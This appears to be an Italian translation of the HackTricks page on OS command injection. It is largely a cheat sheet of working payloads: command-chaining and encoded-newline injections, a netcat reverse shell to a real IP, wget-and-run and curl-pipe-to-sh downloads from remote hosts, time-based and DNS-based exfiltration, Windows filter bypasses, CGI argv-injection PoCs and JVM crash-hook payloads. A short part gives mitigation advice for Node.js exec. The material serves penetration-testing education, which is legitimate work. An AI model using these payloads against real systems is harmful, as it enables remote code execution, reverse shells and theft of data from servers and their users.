Command Injection

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Cos’è command Injection?

Una command injection permette l’esecuzione di comandi arbitrari del sistema operativo da parte di un attacker sul server che ospita un’applicazione. Di conseguenza, l’applicazione e tutti i suoi dati possono essere completamente compromessi. L’esecuzione di questi comandi tipicamente consente all’attacker di ottenere accesso non autorizzato o controllo sull’ambiente dell’applicazione e sul sistema sottostante.

Contesto

A seconda di dove il tuo input viene iniettato potresti dover terminare il contesto tra virgolette (using " or ') prima dei comandi.

Command Injection/Esecuzione

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Limitazioni Bypasses

Se stai cercando di eseguire comandi arbitrari all’interno di una macchina linux, potresti essere interessato a leggere questi Bypasses:

Bypass Linux Restrictions

Esempi

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Parametri

Ecco i primi 25 parametri che potrebbero essere vulnerabili a code injection e a vulnerabilità RCE simili (da link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

Estrazione dei dati: char by char

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

Basato sullo strumento disponibile su https://github.com/HoLyVieR/dnsbin, ospitato anche su dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Strumenti online per verificare DNS based data exfiltration:

  • dnsbin.zhack.ca
  • pingb.in

Filtering bypass

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec vs execFile

Quando esamini back-ends JavaScript/TypeScript incontrerai spesso l’API Node.js child_process.

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});

exec() avvia una shell (/bin/sh -c), quindi qualsiasi carattere che abbia un significato speciale per la shell (back-ticks, ;, &&, |, $(), …) porterà a command injection quando l’input utente viene concatenato nella stringa.

Mitigazione: usa execFile() (o spawn() senza l’opzione shell) e fornisci ogni argomento come elemento separato dell’array in modo che la shell non sia coinvolta:

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);

Caso reale: Synology Photos ≤ 1.7.0-0794 era sfruttabile tramite un evento WebSocket non autenticato che piazzava dati controllati dall’attaccante in id_user che venivano poi incorporati in una chiamata exec(), ottenendo RCE (Pwn2Own Ireland 2024).

Argument/Option injection via leading hyphen (argv, no shell metacharacters)

Non tutte le injection richiedono metacaratteri di shell. Se l’applicazione passa stringhe non attendibili come argomenti a un’utilità di sistema (anche con execve/execFile e senza shell), molti programmi continueranno comunque a interpretare qualsiasi argomento che inizi con - o -- come un’opzione. Questo permette a un attaccante di cambiare modalità, modificare percorsi di output o attivare comportamenti pericolosi senza mai entrare in una shell.

Luoghi tipici in cui questo appare:

  • Embedded web UIs/CGI handlers che costruiscono comandi come ping <user>, tcpdump -i <iface> -w <file>, curl <url>, etc.
  • Centralized CGI routers (e.g., /cgi-bin/<something>.cgi with a selector parameter like topicurl=<handler>) dove più handler riutilizzano lo stesso validatore debole.

Cosa provare:

  • Fornire valori che iniziano con -/-- per essere interpretati come flag dallo strumento a valle.
  • Abusare di flag che cambiano il comportamento o scrivono file, per esempio:
  • ping: -f/-c 100000 per stressare il dispositivo (DoS)
  • curl: -o /tmp/x per scrivere percorsi arbitrari, -K <url> per caricare una config controllata dall’attaccante
  • tcpdump: -G 1 -W 1 -z /path/script.sh per ottenere esecuzione post-rotate in wrapper non sicuri
  • Se il programma supporta -- end-of-options, prova a bypassare mitigazioni ingenue che prepongono -- nel posto sbagliato.

Schemi generici di PoC contro dispatcher CGI centralizzati:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

Callback diagnostici JVM per exec garantita

Qualsiasi primitiva che permette di iniettare argomenti della riga di comando JVM (_JAVA_OPTIONS, file di configurazione del launcher, campi AdditionalJavaArguments negli agent desktop, ecc.) può essere trasformata in un RCE affidabile senza toccare il bytecode dell’applicazione:

  1. Forzare un crash deterministico riducendo metaspace o heap: -XX:MaxMetaspaceSize=16m (o un piccolo -Xmx). Questo garantisce un OutOfMemoryError anche durante il bootstrap iniziale.
  2. Impostare un hook di errore: -XX:OnOutOfMemoryError="<cmd>" o -XX:OnError="<cmd>" esegue un comando OS arbitrario ogni volta che la JVM si arresta.
  3. Facoltativamente aggiungi -XX:+CrashOnOutOfMemoryError per evitare tentativi di recupero e mantenere il payload one-shot.

Esempi di payload:

-XX:MaxMetaspaceSize=16m -XX:OnOutOfMemoryError="cmd.exe /c powershell -nop -w hidden -EncodedCommand <blob>"
-XX:MaxMetaspaceSize=12m -XX:OnOutOfMemoryError="/bin/sh -c 'curl -fsS https://attacker/p.sh | sh'"

Poiché queste diagnostiche vengono analizzate dallo stesso JVM, non sono richiesti metacaratteri di shell e il comando viene eseguito con lo stesso livello di integrità del launcher. I bug di Desktop IPC che inoltrano JVM flags forniti dall’utente (vedi Localhost WebSocket abuse) si traducono quindi direttamente in esecuzione di comandi OS.

Elenco di rilevamento Brute-Force

Auto_Wordlists/wordlists/command_injection.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

Riferimenti

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks